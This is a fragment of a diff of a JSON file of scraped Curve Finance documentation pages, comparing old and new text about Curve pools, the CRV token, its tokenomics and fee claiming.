Bridging funds Using curve on fantom Using curve on polygon Factory Pools Factory Pools Pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross asset swaps Recovering a cross asset swap Dropping and replacing a stuck transaction None Appendix Appendix Glossary Security Links Links Curve.fi Curve DAO Github Governance Forum Technical Docs
Twitter Techincal Documentation Table of contents Welcome to Curve Finance Sections Useful links Home Welcome to Curve Finance Resources and guides to get started with Curve and the Curve DAO Curve's Logo, a colorized Klein Bottle Curve is DeFi's leading AMM , (Automated Market Maker). Hundreds of liquidity pools have been launched through Curve's factory and incentivized by Curve's DAO. Users rely on Curve's proprietary formulas to provide high liquidity, low slippage, and low fee transactions among ERC-20 tokens. Those resources aim to help new and existing users to become familiar with the Curve protocol , the Curve DAO , and the $CRV token . Sections Getting Started with Curve v1 and Curve v2 $CRV Token : Tokenomics, Staking, Claiming Fees Liquidity Providers : Curve Pools, MetaPools, Depositing Reward Gauges : Boosting, Gauge Weights Stablecoin : crvUSD, Soft Liquidation, Bands Governance : Vote Locking, Voting, Snapshot, Proposals Multichain : Bridging, Fantom, Polygon, etc. Creating Pools : Factory Pools, Crypto Factory Pools Troubleshooting : Cross-Asset Swaps, Wallets, Stuck Transactions Useful links Governance dashboard: http://dao.curve.fi/ Governance forum: https://gov.curve.fi/ Telegram: https://t.me/curvefi Twitter: https://twitter.com/curvefinance Discord: https://discord.gg/rgrfS7W Youtube Channel: http://www.youtube.com/c/CurveFinance Technical Docs: https://curve.readthedocs.io Last update: 2023-08-15 Back to top", + "body": "Curve Resources CurveDocs/curve-resources Home Home Table of contents Welcome to Curve Finance Sections Useful links Getting Started Getting Started Understanding Curve (v1) Understanding CryptoPools (v2) $CRV Token $CRV Token Understanding CRV CRV Basics CRV Tokenomics Staking your CRV Claiming trading fees $crvUSD $crvUSD Understanding crvUSD Loan Creation & Management Loan Details & Concepts crvUSD FAQ Liquidity Providers Liquidity Providers Understanding curve pools Base- and Metapools Deposit FAQ Calculating yield Charts and Pool Activity Depositing Depositing Overview Despositing into the tri-pool Despositing into a metapool Despositing into the susd-pool Despositing into a cryptoswap-pool Despositing into a tricrypto-pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your CRV rewards Gauge weights Permissionless rewards Governance Governance Understanding governance Voting Snapshot Vote-locking FAQ Proposals Proposals Proposals Community fund Creating a DAO proposal Multi-Chain Multi-Chain Understanding multi-chain Bridging funds Factory Pools Factory Pools Understanding pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross-Asset swaps Recovering cross-asset swaps Dropping and replacing a stuck transaction Disabling crypto wallets in brave Appendix Appendix Security Glossary Links Links Curve.fi Curve DAO Github Governance Forum Twitter Technical Docs Table of contents Welcome to Curve Finance Sections Useful links Welcome to Curve Finance Resources and guides to get started with Curve and the Curve DAO Curve's Logo, a colorized Klein Bottle Curve is DeFi's leading AMM , (Automated Market Maker). Hundreds of liquidity pools have been launched through Curve's factory and incentivized by Curve's DAO. Users rely on Curve's proprietary formulas to provide high liquidity, low slippage, and low fee transactions among ERC-20 tokens. 
These resources aim to help new and existing users become familiar with the Curve protocol , the Curve DAO , and the $CRV token . Sections Getting Started with Curve v1 and Curve v2 $CRV Token : Tokenomics, Staking, Claiming Fees Liquidity Providers : Curve Pools, MetaPools, Depositing Reward Gauges : Boosting, Gauge Weights, Set Any Token Rewards Stablecoin : crvUSD, Soft Liquidation, Bands Governance : Vote Locking, Voting, Snapshot, Proposals Multichain : Bridging, Fantom, Polygon, etc. Creating Pools : Factory Pools, Crypto Factory Pools Troubleshooting : Cross-Asset Swaps, Wallets, Stuck Transactions Useful links Governance dashboard: http://dao.curve.fi/ Governance forum: https://gov.curve.fi/ Telegram: https://t.me/curvefi Twitter: https://twitter.com/curvefinance Discord: https://discord.gg/rgrfS7W Youtube Channel: http://www.youtube.com/c/CurveFinance Technical Docs: https://curve.readthedocs.io 2023-10-04 Back to top", "labels": [ "Documentation" ] }, { - "title": "Understanding crypto pools", + "title": "Understanding CryptoPools (v2)", "html_url": "https://resources.curve.fi/base-features/understanding-crypto-pools/", - "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding curve Understanding crypto pools Understanding crypto pools Table of contents Understanding Curve v2 Whitepaper Liquidity Providers Fees Risks $crvUSD $crvUSD Understanding crvusd Markets Loan creation Loan details Understanding tokenomics FAQ $CRV Token $CRV Token Understanding crv Crv basics Crv tokenomics Staking your crv Claiming trading fees Liquidity Providers Liquidity Providers Understanding curve pools Base and metapools Deposit faqs Calculating yield Depositing Depositing Depositing Depositing into a metapool Depositing into the susd pool Depositing into the tri pool Depositing into the y pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your crv rewards Gauge weights Governance Governance Understanding governance Vote locking boost Voting Snapshot Proposals Proposals Proposals Community fund Creating a dao proposal Multichain Multichain Understanding multichain Bridging funds Using curve on fantom Using curve on polygon Factory Pools Factory Pools Pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross asset swaps Recovering a cross asset swap Dropping and replacing a stuck transaction None Appendix Appendix Glossary Security Links Links Curve.fi Curve DAO Github Governance Forum Technical Docs Twitter Technical Documentation Table of contents Understanding Curve v2 Whitepaper Liquidity Providers Fees Risks Understanding crypto pools Understanding Curve v2 Crypto pools are Curve pools holding assets with different prices. Curve's core originally supported only pegged assets, but a new type of AMM allows for extremely efficient trading and low risk for non-pegged assets. Crypto pools use liquidity more effectively by concentrating it at current prices. As trades happen, the pool readjusts its internal price to the highest liquidity region without creating losses for the pool. Crypto pools also have variable fees which can range between 0.04% and 0.40%. Tricrypto , the first and main base pool has the following coins: USDT/WBTC/WETH for Ethereum. On Polygon, the first pool has AAVE tokens and can handle swaps with the following tokens: DAI/USDC/USDT/ETH/WBTC. Whitepaper Read the v2 whitepaper by clicking here .
Liquidity Providers Becoming a liquidity provider in a Curve Crypto pool is in all ways similar to stable pools. You will gain exposure to and risks from all assets in the pools. You can deposit one or all the coins in the pool. Always be sure to check the bonus/slippage warning box. Fees Fees on those pools range from 0.04% to 0.4%. The current fee varies based on how close the price is to the internal oracle price. You can check a pool's current fee which changes every trade on the bottom of a pool page. Risks As with any liquidity providing in blockchain, there are some smart contract risks involved. Curve crypto pools have been audited by MixBytes and ChainSecurity but audits never eliminate risks completely. Last update: 2023-08-15 Back to top", + "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding Curve (v1) Understanding CryptoPools (v2) Understanding CryptoPools (v2) Table of contents Whitepaper Liquidity Providers Fees Risks $CRV Token $CRV Token Understanding CRV CRV Basics CRV Tokenomics Staking your CRV Claiming trading fees $crvUSD $crvUSD Understanding crvUSD Loan Creation & Management Loan Details & Concepts crvUSD FAQ Liquidity Providers Liquidity Providers Understanding curve pools Base- and Metapools Deposit FAQ Calculating yield Charts and Pool Activity Depositing Depositing Overview Depositing into the tri-pool Depositing into a metapool Depositing into the susd-pool Depositing into a cryptoswap-pool Depositing into a tricrypto-pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your CRV rewards Gauge weights Permissionless rewards Governance Governance Understanding governance Voting Snapshot Vote-locking FAQ Proposals Proposals Proposals Community fund Creating a DAO proposal Multi-Chain Multi-Chain Understanding multi-chain Bridging funds Factory Pools Factory Pools Understanding pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross-Asset swaps Recovering cross-asset swaps Dropping and replacing a stuck transaction Disabling crypto wallets in brave Appendix Appendix Security Glossary Links Links Curve.fi Curve DAO Github Governance Forum Twitter Technical Docs Table of contents Whitepaper Liquidity Providers Fees Risks Home Getting Started Understanding CryptoPools (v2) Crypto pools are Curve pools holding assets with different prices. Curve's core originally supported only pegged assets, but a new type of AMM allows for extremely efficient trading and low risk for non-pegged assets. Crypto pools use liquidity more effectively by concentrating it at current prices. As trades happen, the pool readjusts its internal price to the highest liquidity region without creating losses for the pool. Crypto pools also have variable fees which can range between 0.04% and 0.40%. Tricrypto , the first and main base pool has the following coins: USDT/WBTC/WETH for Ethereum. On Polygon, the first pool has AAVE tokens and can handle swaps with the following tokens: DAI/USDC/USDT/ETH/WBTC. Whitepaper Read the v2 whitepaper by clicking here . Liquidity Providers Becoming a liquidity provider in a Curve Crypto pool is in all ways similar to stable pools. You will gain exposure to and risks from all assets in the pools. You can deposit one or all the coins in the pool. Always be sure to check the bonus/slippage warning box. Fees Fees on those pools range from 0.04% to 0.4%.
The current fee varies based on how close the price is to the internal oracle price. You can check a pool's current fee which changes every trade on the bottom of a pool page. Risks As with any liquidity providing in blockchain, there are some smart contract risks involved. Curve crypto pools have been audited by MixBytes and ChainSecurity but audits never eliminate risks completely. 2023-09-28 Back to top", "labels": [ "Documentation" ] }, { - "title": "Understanding curve", + "title": "Understanding Curve (v1)", "html_url": "https://resources.curve.fi/base-features/understanding-curve/", - "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding curve Understanding curve Table of contents Understanding Curve v1 What is Curve.fi? What are liquidity pools? What are those percentages next to each pool? What is the CRV token? Can I use Curve on sidechains? How Can I Launch a Pool Why has Curve grown so quickly? Where can I find Curve smart contracts? Understanding crypto pools $crvUSD $crvUSD Understanding crvusd Markets Loan creation Loan details Understanding tokenomics FAQ $CRV Token $CRV Token Understanding crv Crv basics Crv tokenomics Staking your crv Claiming trading fees Liquidity Providers Liquidity Providers Understanding curve pools Base and metapools Deposit faqs Calculating yield Depositing Depositing Depositing Depositing into a metapool Depositing into the susd pool Depositing into the tri pool Depositing into the y pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your crv rewards Gauge weights Governance Governance Understanding governance Vote locking boost Voting Snapshot Proposals Proposals Proposals Community fund Creating a dao proposal Multichain Multichain Understanding multichain Bridging funds Using curve on fantom Using curve on polygon Factory Pools Factory Pools Pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross asset swaps Recovering a cross asset swap Dropping and replacing a stuck transaction None Appendix Appendix Glossary Security Links Links Curve.fi Curve DAO Github Governance Forum Technical Docs Twitter Technical Documentation Table of contents Understanding Curve v1 What is Curve.fi? What are liquidity pools? What are those percentages next to each pool? What is the CRV token? Can I use Curve on sidechains? How Can I Launch a Pool Why has Curve grown so quickly? Where can I find Curve smart contracts? Understanding curve Understanding Curve v1 A short guide to understand the basics of becoming a liquidity provider on Curve. Getting started with Curve isn't easy, there is a lot to grasp and the unique UI can be a lot to take in. This small guide is intended for Curve beginners with an understanding of DeFi and Crypto. It tries to answer recurring questions about how to get started with Curve and how it works or makes money for liquidity providers. What is Curve.fi? The easiest way to understand Curve is to see it as an exchange. Its main goal is to let users and other decentralised protocols exchange ERC-20 tokens (DAI to USDC for example) through it with low fees and low slippage . Unlike exchanges that match a buyer and a seller, Curve uses liquidity pools. To achieve successful exchange volume, Curve needs a high volume of liquidity (tokens) and therefore offers rewards to liquidity providers . Curve is non-custodial , meaning the Curve developers do not have access to your tokens.
Curve pools are also non-upgradable, so you can have confidence that the logic protecting your funds can never change. What are liquidity pools? Liquidity pools are pools of tokens that sit in smart contracts and can be exchanged or withdrawn at rates set by the parameters of the smart contract. Adding liquidity to a liquidity pool gives you the opportunity to earn trading fees and possibly rewards. For more information, visit the following section: Understanding Curve Pools What are those percentages next to each pool? Curve pools may have several different percentages shown next to them in the UI. The first column, vAPY, refers to the annualized rate of trading fees earned by liquidity providers in the pool. Any activity on every Curve pool generates fees, a portion of which accrue to everybody who has a stake in the pool. Further information is in the Liquidity Provider section . The second column refers to the reward gauges. This entitles liquidity providers to earn bonus CRV emissions. More detail on these bonuses are in the Reward Gauges section . What is the CRV token? CRV token is a governance and utility token for Curve. Understanding $CRV Understanding Governance Can I use Curve on sidechains? Yes. Curve has launched on several sidechains and will continue to do so. Visit our section on Multichain for more information. How Can I Launch a Pool All new Curve pools are deployed permissionlessly through the Curve Factory. This means anybody can deploy a pool anytime, anywhere. For a full guide, check our Factory Pools section. Why has Curve grown so quickly? When Curve launched it grew quickly by securing the underdeveloped stablecoin market. Stablecoins have become an inherent part of cryptocurrency for a long time but they now come in many different flavours (DAI, TUSD, sUSD, bUSD, USDC and so on) which means there is a much bigger need for crypto users to move from a stable coin to another. Centralised exchanges tend to have high fees which are problematic for those trying to move from a stable coin to another. As a result, Curve.fi has become the best place to exchange stable coins because of its low fees and low slippage. The proprietary Curve StableSwap exchange was outlined in the founding whitepaper, and provides a superior formula for exchanging stablecoins than competing AMMs. Read through the whitepaper to learn more. More recently, Curve launched v2 Crypto Pools to bring the same simplicity and efficiency of Curve's stablecoin pools to transactions between differentially priced assets (ie BTC and ETH). These pools are sufficiently different to justify their own section: Where can I find Curve smart contracts? Here: https://www.curve.fi/contracts The Github repository also open sources the bulk of Curve development activity. Last update: 2023-08-15 Back to top", + "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding Curve (v1) Understanding Curve (v1) Table of contents What is Curve.fi? What are liquidity pools? What are those percentages next to each pool? What is the CRV token? Can I use Curve on sidechains? How Can I Launch a Pool Why has Curve grown so quickly? Where can I find Curve smart contracts? 
Understanding CryptoPools (v2) $CRV Token $CRV Token Understanding CRV CRV Basics CRV Tokenomics Staking your CRV Claiming trading fees $crvUSD $crvUSD Understanding crvUSD Loan Creation & Management Loan Details & Concepts crvUSD FAQ Liquidity Providers Liquidity Providers Understanding curve pools Base- and Metapools Deposit FAQ Calculating yield Charts and Pool Activity Depositing Depositing Overview Despositing into the tri-pool Despositing into a metapool Despositing into the susd-pool Despositing into a cryptoswap-pool Despositing into a tricrypto-pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your CRV rewards Gauge weights Permissionless rewards Governance Governance Understanding governance Voting Snapshot Vote-locking FAQ Proposals Proposals Proposals Community fund Creating a DAO proposal Multi-Chain Multi-Chain Understanding multi-chain Bridging funds Factory Pools Factory Pools Understanding pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross-Asset swaps Recovering cross-asset swaps Dropping and replacing a stuck transaction Disabling crypto wallets in brave Appendix Appendix Security Glossary Links Links Curve.fi Curve DAO Github Governance Forum Twitter Technical Docs Table of contents What is Curve.fi? What are liquidity pools? What are those percentages next to each pool? What is the CRV token? Can I use Curve on sidechains? How Can I Launch a Pool Why has Curve grown so quickly? Where can I find Curve smart contracts? Home Getting Started Understanding Curve (v1) A short guide to understand the basics of becoming a liquidity provider on Curve. Getting started with Curve isnt easy, there is a lot to grasp and the unique UI can be a lot to take in. This small guide is intended for Curve beginners with an understanding of DeFi and Crypto. It tries to answer recurring questions about how to get started with Curve and how it works or makes money for liquidity providers. What is Curve.fi? The easiest way to understand Curve is to see it as an exchange. Its main goal is to let users and other decentralised protocols exchange ERC-20 tokens (DAI to USDC for example) through it with low fees and low slippage . Unlike exchanges that match a buyer and a seller, Curve uses liquidity pools. To achieve successful exchange volume, Curve needs a high volume of liquidity (tokens) and therefore offers rewards to liquidity providers . Curve is non-custodial , meaning the Curve developers do not have access to your tokens. Curve pools are also non-upgradable, so you can have confidence that the logic protecting your funds can never change. What are liquidity pools? Liquidity pools are pools of tokens that sit in smart contracts and can be exchanged or withdrawn at rates set by the parameters of the smart contract. Adding liquidity to a liquidity pool gives you the opportunity to earn trading fees and possibly rewards. For more information, visit the following section: Understanding Curve Pools What are those percentages next to each pool? Curve pools may have several different percentages shown next to them in the UI. The first column, vAPY, refers to the annualized rate of trading fees earned by liquidity providers in the pool. Any activity on every Curve pool generates fees, a portion of which accrue to everybody who has a stake in the pool. Further information is in the Liquidity Provider section . The second column refers to the reward gauges. 
This entitles liquidity providers to earn bonus CRV emissions. More detail on these bonuses are in the Reward Gauges section . What is the CRV token? CRV token is a governance and utility token for Curve. Understanding $CRV Understanding Governance Can I use Curve on sidechains? Yes. Curve has launched on several sidechains and will continue to do so. Visit our section on Multichain for more information. How Can I Launch a Pool All new Curve pools are deployed permissionlessly through the Curve Factory. This means anybody can deploy a pool anytime, anywhere. For a full guide, check our Factory Pools section. Why has Curve grown so quickly? When Curve launched it grew quickly by securing the underdeveloped stablecoin market. Stablecoins have become an inherent part of cryptocurrency for a long time but they now come in many different flavours (DAI, TUSD, sUSD, bUSD, USDC and so on) which means there is a much bigger need for crypto users to move from a stable coin to another. Centralised exchanges tend to have high fees which are problematic for those trying to move from a stable coin to another. As a result, Curve.fi has become the best place to exchange stable coins because of its low fees and low slippage. The proprietary Curve StableSwap exchange was outlined in the founding whitepaper, and provides a superior formula for exchanging stablecoins than competing AMMs. Read through the whitepaper to learn more. More recently, Curve launched v2 Crypto Pools to bring the same simplicity and efficiency of Curve's stablecoin pools to transactions between differentially priced assets (ie BTC and ETH). These pools are sufficiently different to justify their own section: Where can I find Curve smart contracts? Here: https://www.curve.fi/contracts The Github repository also open sources the bulk of Curve development activity. 2023-09-28 Back to top", "labels": [ "Documentation" ] @@ -1850,63 +1850,63 @@ { "title": "Claiming trading fees", "html_url": "https://resources.curve.fi/crv-token/claiming-trading-fees/", - "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding curve Understanding crypto pools $crvUSD $crvUSD Understanding crvusd Markets Loan creation Loan details Understanding tokenomics FAQ $CRV Token $CRV Token Understanding crv Crv basics Crv tokenomics Staking your crv Claiming trading fees Claiming trading fees Table of contents Claiming Trading Fees Swapping 3CRV for a stable coin How does it all work? 
Liquidity Providers Liquidity Providers Understanding curve pools Base and metapools Deposit faqs Calculating yield Depositing Depositing Depositing Depositing into a metapool Depositing into the susd pool Depositing into the tri pool Depositing into the y pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your crv rewards Gauge weights Governance Governance Understanding governance Vote locking boost Voting Snapshot Proposals Proposals Proposals Community fund Creating a dao proposal Multichain Multichain Understanding multichain Bridging funds Using curve on fantom Using curve on polygon Factory Pools Factory Pools Pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross asset swaps Recovering a cross asset swap Dropping and replacing a stuck transaction None Appendix Appendix Glossary Security Links Links Curve.fi Curve DAO Github Governance Forum Technical Docs Twitter Technical Documentation Table of contents Claiming Trading Fees Swapping 3CRV for a stable coin How does it all work? Claiming trading fees Claiming Trading Fees Users who stake $CRV can claim trading fees as often as they'd like, but fees will only be converted into 3CRV once a week. To claim your fees, visit https://curve.fi/#/ethereum/dashboard and click the blue \"Claim LP Rewards\" button. If you are using the classic UI please visit: https://classic.curve.fi/ and look for the green \"Claim\" button in the box labeled \"veCRV 3pool LP claim\" at the bottom of the page. Every time a trade takes place on Curve Finance, 50% of the trading fee is collected by the users who have vote locked their CRV. Every week, fees are collected from the pools, converted to 3CRV and distributed. There is a delay before you can first claim your 3CRV after locking. It takes 8 days from the Thursday after you lock before you can claim. Understanding $CRV Swapping 3CRV for a stable coin If you would like to swap your 3CRV back into a stable coin, you can head to https://curve.fi/#/ethereum/pools/3pool/withdraw , select the stable you would like to receive (optional) and click \" Withdraw \". After confirming your transaction, you will then receive your chosen stablecoin. How does it all work? When the burn is triggered, a contract collects all trading fees from all the swap pool contracts. Those fees come in dozens of different stablecoin, tokenized Bitcoin and Ethereum flavours. The fee tokens are traded into USDC using Curve and Synthetix, which is then deposited to 3Pool. Finally, the burner creates a checkpoint which updates the claimable balance of each veCRV holder. Burning is an expensive process, as it involves many complex transactions, but anyone can trigger the process whenever they wish if they are willing to pay for it. Fees may only be claimed for the week that has already passed, because the burner does not know how much everyone is entitled to before the end of the period. Fees will be available on a weekly basis within 24 hours after Thursday midnight UTC, as long as someone (usually the Curve team) has initiated the burn prior to that.
Technical users can review the burner contracts here: https://github.com/curvefi/curve-dao-contracts/tree/master/contracts/burners The following script may be used to initiate the burn process: https://github.com/curvefi/curve-dao-contracts/blob/master/scripts/burners/claim_and_burn_fees.py Last update: 2023-08-15 Back to top", + "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding Curve (v1) Understanding CryptoPools (v2) $CRV Token $CRV Token Understanding CRV CRV Basics CRV Tokenomics Staking your CRV Claiming trading fees Claiming trading fees Table of contents Swapping 3CRV for a stable coin How does it all work? $crvUSD $crvUSD Understanding crvUSD Loan Creation & Management Loan Details & Concepts crvUSD FAQ Liquidity Providers Liquidity Providers Understanding curve pools Base- and Metapools Deposit FAQ Calculating yield Charts and Pool Activity Depositing Depositing Overview Depositing into the tri-pool Depositing into a metapool Depositing into the susd-pool Depositing into a cryptoswap-pool Depositing into a tricrypto-pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your CRV rewards Gauge weights Permissionless rewards Governance Governance Understanding governance Voting Snapshot Vote-locking FAQ Proposals Proposals Proposals Community fund Creating a DAO proposal Multi-Chain Multi-Chain Understanding multi-chain Bridging funds Factory Pools Factory Pools Understanding pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross-Asset swaps Recovering cross-asset swaps Dropping and replacing a stuck transaction Disabling crypto wallets in brave Appendix Appendix Security Glossary Links Links Curve.fi Curve DAO Github Governance Forum Twitter Technical Docs Table of contents Swapping 3CRV for a stable coin How does it all work? Home $CRV Token Claiming trading fees Users who stake $CRV can claim trading fees as often as they'd like, but fees will only be converted into 3CRV once a week. To claim your fees, visit https://curve.fi/#/ethereum/dashboard and click the blue \"Claim LP Rewards\" button. If you are using the classic UI please visit: https://classic.curve.fi/ and look for the green \"Claim\" button in the box labeled \"veCRV 3pool LP claim\" at the bottom of the page. Every time a trade takes place on Curve Finance, 50% of the trading fee is collected by the users who have vote locked their CRV. Every week, fees are collected from the pools, converted to 3CRV and distributed. There is a delay before you can first claim your 3CRV after locking. It takes 8 days from the Thursday after you lock before you can claim. Understanding $CRV Swapping 3CRV for a stable coin If you would like to withdraw your 3CRV back into a stable coin, you can head to https://curve.fi/#/ethereum/pools/3pool/withdraw , select the stable you would like to receive (optional) and click \" Withdraw \". After confirming your transaction, you will then receive your chosen stablecoin. How does it all work? When the burn is triggered, a contract collects all trading fees from all the swap pool contracts. Those fees come in dozens of different stablecoin, tokenized Bitcoin and Ethereum flavours. The fee tokens are traded into USDC using Curve and Synthetix, which is then deposited to 3Pool. Finally, the burner creates a checkpoint which updates the claimable balance of each veCRV holder.
Burning is an expensive process, as it involves many complex transactions, but anyone can trigger the process whenever they wish if they are willing to pay for it. Fees may only be claimed for the week that has already passed, because the burner does not know how much everyone is entitled to before the end of the period. Fees will be available on a weekly basis within 24 hours after Thursday midnight UTC, as long as someone (usually the Curve team) has initiated the burn prior to that. Technical users can review the burner contracts here: https://github.com/curvefi/curve-dao-contracts/tree/master/contracts/burners The following script may be used to initiate the burn process: https://github.com/curvefi/curve-dao-contracts/blob/master/scripts/burners/claim_and_burn_fees.py 2023-09-28 Back to top", "labels": [ "Documentation" ] }, { - "title": "Crv basics", + "title": "CRV Basics", "html_url": "https://resources.curve.fi/crv-token/crv-basics/", - "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding curve Understanding crypto pools $crvUSD $crvUSD Understanding crvusd Markets Loan creation Loan details Understanding tokenomics FAQ $CRV Token $CRV Token Understanding crv Crv basics Crv basics Table of contents $CRV Basics What is the purpose of $CRV? How to get $CRV? Where can I find the release schedule? What is the current circulating supply? What is the utility of $CRV? What is $CRV vote locking? Crv tokenomics Staking your crv Claiming trading fees Liquidity Providers Liquidity Providers Understanding curve pools Base and metapools Deposit faqs Calculating yield Depositing Depositing Depositing Depositing into a metapool Depositing into the susd pool Depositing into the tri pool Depositing into the y pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your crv rewards Gauge weights Governance Governance Understanding governance Vote locking boost Voting Snapshot Proposals Proposals Proposals Community fund Creating a dao proposal Multichain Multichain Understanding multichain Bridging funds Using curve on fantom Using curve on polygon Factory Pools Factory Pools Pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross asset swaps Recovering a cross asset swap Dropping and replacing a stuck transaction None Appendix Appendix Glossary Security Links Links Curve.fi Curve DAO Github Governance Forum Technical Docs Twitter Techincal Documentation Table of contents $CRV Basics What is the purpose of $CRV? How to get $CRV? Where can I find the release schedule? What is the current circulating supply? What is the utility of $CRV? What is $CRV vote locking? Crv basics $CRV Basics Basics about the CRV token. What is the purpose of $CRV? The main purposes of the Curve DAO token are to incentivise liquidity providers on the Curve Finance platform as well as getting as many users involved as possible in the governance of the protocol. How to get $CRV? Liquidity providers on the Curve platform receive $CRV for providing liquidity. This ensures the protocol continues offering low fees and extremely low slippage. Where can I find the release schedule? You can find the release schedule for the next six years at this address: https://dao.curve.fi/inflation What is the current circulating supply? The current circulating supply can be found at this address: https://dao.curve.fi/inflation What is the utility of $CRV? 
$CRV is a governance token with time-weighted voting and value accrual mechanisms. You can find out what to do with $CRV by clicking below: Understanding $CRV What is $CRV vote locking? One of the most important incentives for holding CRV is the vote locking boost. Each liquidity provider can increase their daily CRV rewards by vote locking CRV. You can vote lock your CRV at this address: https://dao.curve.fi/locker Last update: 2023-08-15 Back to top", + "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding Curve (v1) Understanding CryptoPools (v2) $CRV Token $CRV Token Understanding CRV CRV Basics CRV Basics Table of contents What is the purpose of $CRV? How to get $CRV? Where can I find the release schedule? What is the current circulating supply? What is the utility of $CRV? What is $CRV vote locking? CRV Tokenomics Staking your CRV Claiming trading fees $crvUSD $crvUSD Understanding crvUSD Loan Creation & Management Loan Details & Concepts crvUSD FAQ Liquidity Providers Liquidity Providers Understanding curve pools Base- and Metapools Deposit FAQ Calculating yield Charts and Pool Activity Depositing Depositing Overview Depositing into the tri-pool Depositing into a metapool Depositing into the susd-pool Depositing into a cryptoswap-pool Depositing into a tricrypto-pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your CRV rewards Gauge weights Permissionless rewards Governance Governance Understanding governance Voting Snapshot Vote-locking FAQ Proposals Proposals Proposals Community fund Creating a DAO proposal Multi-Chain Multi-Chain Understanding multi-chain Bridging funds Factory Pools Factory Pools Understanding pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross-Asset swaps Recovering cross-asset swaps Dropping and replacing a stuck transaction Disabling crypto wallets in brave Appendix Appendix Security Glossary Links Links Curve.fi Curve DAO Github Governance Forum Twitter Technical Docs Table of contents What is the purpose of $CRV? How to get $CRV? Where can I find the release schedule? What is the current circulating supply? What is the utility of $CRV? What is $CRV vote locking? Home $CRV Token CRV Basics What is the purpose of $CRV? The main purposes of the Curve DAO token are to incentivise liquidity providers on the Curve Finance platform as well as getting as many users involved as possible in the governance of the protocol. How to get $CRV? Liquidity providers on the Curve platform receive $CRV for providing liquidity. This ensures the protocol continues offering low fees and extremely low slippage. Where can I find the release schedule? You can find the release schedule for the next six years at this address: https://dao.curve.fi/inflation What is the current circulating supply? The current circulating supply can be found at this address: https://dao.curve.fi/inflation What is the utility of $CRV? $CRV is a governance token with time-weighted voting and value accrual mechanisms. You can find out what to do with $CRV by clicking below: Understanding $CRV What is $CRV vote locking? One of the most important incentives for holding CRV is the vote locking boost. Each liquidity provider can increase their daily CRV rewards by vote locking CRV.
You can vote lock your CRV at this address: https://dao.curve.fi/locker 2023-09-28 Back to top", "labels": [ "Documentation" ] }, { - "title": "Crv tokenomics", + "title": "CRV Tokenomics", "html_url": "https://resources.curve.fi/crv-token/crv-tokenomics/", - "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding curve Understanding crypto pools $crvUSD $crvUSD Understanding crvusd Markets Loan creation Loan details Understanding tokenomics FAQ $CRV Token $CRV Token Understanding crv Crv basics Crv tokenomics Crv tokenomics Table of contents $CRV Tokenomics Supply Staking your crv Claiming trading fees Liquidity Providers Liquidity Providers Understanding curve pools Base and metapools Deposit faqs Calculating yield Depositing Depositing Depositing Depositing into a metapool Depositing into the susd pool Depositing into the tri pool Depositing into the y pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your crv rewards Gauge weights Governance Governance Understanding governance Vote locking boost Voting Snapshot Proposals Proposals Proposals Community fund Creating a dao proposal Multichain Multichain Understanding multichain Bridging funds Using curve on fantom Using curve on polygon Factory Pools Factory Pools Pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross asset swaps Recovering a cross asset swap Dropping and replacing a stuck transaction None Appendix Appendix Glossary Security Links Links Curve.fi Curve DAO Github Governance Forum Technical Docs Twitter Techincal Documentation Table of contents $CRV Tokenomics Supply Crv tokenomics $CRV Tokenomics $CRV officially launched on the 13 th of August 2020. The main purposes of the Curve DAO token are to incentivise liquidity providers on the Curve Finance platform as well as getting as many users involved as possible in the governance of the protocol. Supply The total supply of 3.03b is distributed as such: 62% to community liquidity providers 30% to shareholders (team and investors) with 2-4 years vesting 3% to employees with 2 years vesting 5% to the community reserve The initial supply of around 1.3b (~43%) is distributed as such: 5% to pre-CRV liquidity providers with 1 year vesting 30% to shareholders (team and investors) with 2-4 years vesting 3% to employees with 2 years vesting 5% to the community reserve The circulating supply will be 0 at launch and the initial release rate will be around 2m CRV per day. 
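A quick arithmetic check on the distribution figures above (our own calculation, not part of the source page): the total-supply shares sum to 62% + 30% + 3% + 5% = 100%, and the initial-supply shares are consistent with the ~43% figure:

```latex
\[
3.03\,\mathrm{b} \times (5\% + 30\% + 3\% + 5\%) \;=\; 3.03\,\mathrm{b} \times 0.43 \;\approx\; 1.30\,\mathrm{b}
\]
```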
